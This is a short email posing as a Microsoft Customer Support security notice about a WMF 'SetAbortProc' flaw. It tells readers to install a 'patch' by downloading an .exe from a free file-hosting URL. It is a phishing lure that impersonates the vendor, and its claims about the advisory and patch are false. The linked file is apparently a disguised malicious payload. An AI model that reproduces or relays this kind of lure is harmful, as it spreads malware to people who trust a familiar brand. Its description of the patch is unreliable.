Dear Microsoft Customers. Greetings, In program maintenance of Microsoft
corporation, a critical vulnerability has been found in processing
WMF-files. Exploits using the "SetAbortProc" GDI function were discovered
in May 2007. The function, which registers an error handler normally
intended for use when a print job is cancelled during spooling, allows
arbitrary code added to a WMF image to be executed without the permission
of the user. Microsoft has released a critical update for Windows
98/2000/XP and Vista. We urge you to update your Windows operating system
with the patch attached, to prevent malicious users from compromising
your systems security. Our patch is attached onto email. With best
regards, the Microsoft Customer Support. Attach:
http://h1.ripway.com/daxter/wmf-patch-windows32.exe